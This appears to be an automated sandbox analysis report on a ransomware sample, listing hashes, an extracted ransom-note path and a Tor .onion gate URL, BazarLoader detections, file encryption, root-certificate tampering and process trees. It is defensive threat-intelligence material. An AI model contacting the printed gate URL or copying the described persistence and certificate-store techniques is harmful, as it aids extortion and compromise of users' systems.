Analysis
- max time kernel: 188s
- max time network: 168s
- platform: windows10_x64
- resource: win10-en-20211104
- submitted: 12/11/2021, 09:21

Static task: static1

Behavioral task: behavioral1
- Sample: jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
- Resource: win7-en-20211014

Behavioral task: behavioral2
- Sample: jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
- Resource: win10-en-20211104

General
- Target: jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
- Size: 58KB
- MD5: 1cc5b508da9567f032ed78375bb45959
- SHA1: c31a0e58ae70f571bf8140db8a1ab20a7f566ab5
- SHA256: 315045e506eb5e9f5fd24e4a55cda48d223ac3450037586ce6dab70afc8ddfc9
- SHA512: cef3bdf76e94904e0d170d3d208accef9ff8e50b85403130b12914ee6b20f0e49f58aa840757c7855b656cffa4400b83cd81fc5196fea66045a5724886970d61
Malware Config
Extracted:
- Ransom note path: C:\$Recycle.Bin\S-1-5-21-1042495040-510797905-2613508344-1000\BackFiles_encoded01.txt
- Gate URL: http://chat5sqrnzqewampznybomgn4hf2m53tybkarxk4sfaktwt7oqpkcvyd.onion/gate.php?data=mMuO7yV2SabitZONNkW5UPOl5NlDMwuw%2BIWgw1YloCHRm7PeEEJnkNObpLwYcIh2%2FbO2mQobKcyKiLL2EnGIY6W%2F341WGA7V1vP%2B438O9GOs55a%2FExwrnobn%2FetHK8FO1PG9z11AfYbK9%2BbkWiGDaajx6cVcBCiDyNn761oizze2%2FaiJTBJ09dLF1%2BZGKfwbwLGc1TFXf7P6hfLpACGyRvOH%2F7sARA%2FntcDe1UUW2ir1loOJHDt5lMLR%2B%2Bs2IYZA4KfHpHURf%2B6J%2FMHJAzCBJ62ioI84Rie5%2FoHY91VFh2%2Frku%2B3RjwOkdTN6%2BZCDOoU9JXuhF9AD7b06P%2FgK12Fftf%2F%2FdhjIB7epNGg9XsLjSjN9YiZLSckmp6C0sA1fac0wZK7jUggLIPQ99vLZgfDH%2BO775kuOTuw7YTloFVRlGH8mMueHE5w0ImM9stsCtI63feOmBwXeZ7Y%2B%2B7xDGHSfvW6%2FblqLnDCieziz0Qf%2B2bb%2BK25GSgiw56C1v8ka9lf7oDCgHMmbJSghtnYbhT6Jsq5oJ4zCCCkzub3wBR0hm7AgceCV1N74IuB3N1uD4oB8YiA2k4EH7DM18PsDSWGQ%2Bu4uo59BHHSg9br%2FBN3%2Fxz5j%2BylOScUm%2FjK0LYpeJAiqo2r3Wc9AeuogcXhQ3yPCuCnrp0VOjuF7Pf9sxRJgnHNu6vdZxMm743lys4Od%2FEFqJTslRUILpeegtbWM0C0bamCyahjRznk1vnSyQ9yzWXYiJvYTwYZve7K0fQNNtNBqqb3tk0DcJ%2FV1%2BPCBnfrE%2FCkkN4iFQW%2BjJWmwz5bhmv9kbnYaz8GyqP62fpGEIl1qIOYmEM%2BA7XM2v7wDlC5UNSx94JLPSrxrdnlvwQx4BzVtYjJSDQVmNnypPwpNtNBq57ArQBED%2FOk1MnFBnzeHKukjN4jSxm17PzF4SJD0E%2Bt8tTWXyJ7xKjjx%2BoDL5xi2KTvyUg0Gr2DwObGKUGvTtnuvKl8MQvLjOXq63kxyjv3sI2JTRM8hN%2F2rNUrW6giqonYhlFGG5bQz6G8RA6NB%2F6Dv6k%2FPCeCweDG0ShFs06rh9uhdgZ59Kjz5OcEd%2F8R3qazqjEwBbrf%2BOPzNVu4NvSx6o5mIyXnuM2gvn83yxLrqvzePEd0tcHUxOwfNtNF3r63lnUyD5e0xsS8WT37PtDxipo4BSDB%2FpWmxx9QlEbWvPa9VwQC0ojh6cZFF8gqooiPjQkQfJ%2FX%2FuzwAFnZUr34yg%3D%3D
Signatures

Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.
-
Bazar/Team9 Loader payload (2 IoCs)
resource / yara_rule:
- behavioral2/files/0x0003000000023b46-135.dat: BazarLoaderVar5
- behavioral2/files/0x0003000000023b46-136.dat: BazarLoaderVar5
Executes dropped EXE (4 IoCs)
pid / Process:
- 2116 firefox.exe
- 4080 tor.exe
- 4520 firefox.exe
- 3644 firefox.exe
Modifies extensions of user files (3 IoCs)
Ransomware generally changes the extension on encrypted files.
description / ioc / Process:
- File created \??\c:\users\admin\pictures\saveopen.crw.encoded01 (jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe)
- File opened for modification \??\c:\users\admin\pictures\watchgrant.tiff (jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe)
- File created \??\c:\users\admin\pictures\watchgrant.tiff.encoded01 (jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe)
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
description / ioc / Process:
- Key value queried \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\International\Geo\Nation (firefox.exe)
Drops startup file (1 IoC)
description / ioc / Process:
- File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\BackFiles_encoded01.txt (jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe)
Loads dropped DLL (27 IoCs)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops desktop.ini file(s) (32 IoCs)
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow / ioc:
- 15 whatismyipaddress.com
- 13 whatismyipaddress.com
Drops file in Program Files directory (64 IoCs)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Checks processor information in registry (2 TTPs, 5 IoCs)
Processor information is often read in order to detect sandboxing environments.
description / ioc / Process:
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature (firefox.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision (firefox.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz (firefox.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier (firefox.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (firefox.exe)
Modifies system certificate store (2 IoCs)
description / ioc / Process:
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 (jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe)
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary certificate blob not reproduced in the report) (jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe)
Opens file in notepad (likely ransom note) (2 IoCs)
pid / Process:
- 4252 NOTEPAD.EXE
- 5044 notepad.exe
Suspicious behavior: EnumeratesProcesses (6 IoCs)
pid / Process:
- 4080 tor.exe
- 4080 tor.exe
- 4080 tor.exe
- 4080 tor.exe
- 4080 tor.exe
- 4080 tor.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes

C:\Users\Admin\AppData\Local\Temp\jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe (PID 396)
  Command line: "C:\Users\Admin\AppData\Local\Temp\jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe"
  - Modifies extensions of user files
  - Drops startup file
  - Drops desktop.ini file(s)
  - Drops file in Program Files directory
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\notepad.exe (PID 5044)
    Command line: "notepad.exe" C:\Users\Admin\Desktop\BackFiles_encoded01.txt
    - Opens file in notepad (likely ransom note)

  C:\Users\Admin\Desktop\browser\firefox.exe (PID 2116)
    Command line: "C:\Users\Admin\Desktop\browser\firefox.exe" --allow-remote http://chat5sqrnzqewampznybomgn4hf2m53tybkarxk4sfaktwt7oqpkcvyd.onion/gate.php?data=mMuO7yV2SabitZONNkW5UPOl5NlDMwuw%2BIWgw1YloCHRm7PeEEJnkNObpLwYcIh2%2FbO2mQobKcyKiLL2EnGIY6W%2F341WGA7V1vP%2B438O9GOs55a%2FExwrnobn%2FetHK8FO1PG9z11AfYbK9%2BbkWiGDaajx6cVcBCiDyNn761oizze2%2FaiJTBJ09dLF1%2BZGKfwbwLGc1TFXf7P6hfLpACGyRvOH%2F7sARA%2FntcDe1UUW2ir1loOJHDt5lMLR%2B%2Bs2IYZA4KfHpHURf%2B6J%2FMHJAzCBJ62ioI84Rie5%2FoHY91VFh2%2Frku%2B3RjwOkdTN6%2BZCDOoU9JXuhF9AD7b06P%2FgK12Fftf%2F%2FdhjIB7epNGg9XsLjSjN9YiZLSckmp6C0sA1fac0wZK7jUggLIPQ99vLZgfDH%2BO775kuOTuw7YTloFVRlGH8mMueHE5w0ImM9stsCtI63feOmBwXeZ7Y%2B%2B7xDGHSfvW6%2FblqLnDCieziz0Qf%2B2bb%2BK25GSgiw56C1v8ka9lf7oDCgHMmbJSghtnYbhT6Jsq5oJ4zCCCkzub3wBR0hm7AgceCV1N74IuB3N1uD4oB8YiA2k4EH7DM18PsDSWGQ%2Bu4uo59BHHSg9br%2FBN3%2Fxz5j%2BylOScUm%2FjK0LYpeJAiqo2r3Wc9AeuogcXhQ3yPCuCnrp0VOjuF7Pf9sxRJgnHNu6vdZxMm743lys4Od%2FEFqJTslRUILpeegtbWM0C0bamCyahjRznk1vnSyQ9yzWXYiJvYTwYZve7K0fQNNtNBqqb3tk0DcJ%2FV1%2BPCBnfrE%2FCkkN4iFQW%2BjJWmwz5bhmv9kbnYaz8GyqP62fpGEIl1qIOYmEM%2BA7XM2v7wDlC5UNSx94JLPSrxrdnlvwQx4BzVtYjJSDQVmNnypPwpNtNBq57ArQBED%2FOk1MnFBnzeHKukjN4jSxm17PzF4SJD0E%2Bt8tTWXyJ7xKjjx%2BoDL5xi2KTvyUg0Gr2DwObGKUGvTtnuvKl8MQvLjOXq63kxyjv3sI2JTRM8hN%2F2rNUrW6giqonYhlFGG5bQz6G8RA6NB%2F6Dv6k%2FPCeCweDG0ShFs06rh9uhdgZ59Kjz5OcEd%2F8R3qazqjEwBbrf%2BOPzNVu4NvSx6o5mIyXnuM2gvn83yxLrqvzePEd0tcHUxOwfNtNF3r63lnUyD5e0xsS8WT37PtDxipo4BSDB%2FpWmxx9QlEbWvPa9VwQC0ojh6cZFF8gqooiPjQkQfJ%2FX%2FuzwAFnZUr34yg%3D%3D
    - Executes dropped EXE
    - Checks computer location settings
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\Desktop\browser\TorBrowser\Tor\tor.exe (PID 4080)
      Command line: "C:\Users\Admin\Desktop\browser\TorBrowser\Tor\tor.exe" --defaults-torrc C:\Users\Admin\Desktop\browser\TorBrowser\Data\Tor\torrc-defaults -f C:\Users\Admin\Desktop\browser\TorBrowser\Data\Tor\torrc DataDirectory C:\Users\Admin\Desktop\browser\TorBrowser\Data\Tor GeoIPFile C:\Users\Admin\Desktop\browser\TorBrowser\Data\Tor\geoip GeoIPv6File C:\Users\Admin\Desktop\browser\TorBrowser\Data\Tor\geoip6 HashedControlPassword 16:d19d18e4d27836e9608bf684c8b043ab75abc23854a3fc0b6b3391a336 +__ControlPort 9151 +__SocksPort "127.0.0.1:9150 IPv6Traffic PreferIPv6 KeepAliveIsolateSOCKSAuth" __OwningControllerProcess 2116 DisableNetwork 1
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses

    C:\Users\Admin\Desktop\browser\firefox.exe (PID 4520)
      Command line: "C:\Users\Admin\Desktop\browser\firefox.exe" -contentproc --channel="2116.0.627203460\838123476" -childID 1 -isForBrowser -boolPrefs 299:0| -schedulerPrefs 0001,2 -greomni "C:\Users\Admin\Desktop\browser\omni.ja" -appomni "C:\Users\Admin\Desktop\browser\browser\omni.ja" -appdir "C:\Users\Admin\Desktop\browser\browser" 2116 tab
      - Executes dropped EXE
      - Loads dropped DLL

    C:\Users\Admin\Desktop\browser\firefox.exe (PID 3644)
      Command line: "C:\Users\Admin\Desktop\browser\firefox.exe" -contentproc --channel="2116.6.433665060\1608908876" -childID 2 -isForBrowser -boolPrefs 299:0| -schedulerPrefs 0001,2 -greomni "C:\Users\Admin\Desktop\browser\omni.ja" -appomni "C:\Users\Admin\Desktop\browser\browser\omni.ja" -appdir "C:\Users\Admin\Desktop\browser\browser" 2116 tab
      - Executes dropped EXE
      - Loads dropped DLL

C:\Windows\system32\NOTEPAD.EXE (PID 4252)
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\BackFiles_encoded01.txt
  - Opens file in notepad (likely ransom note)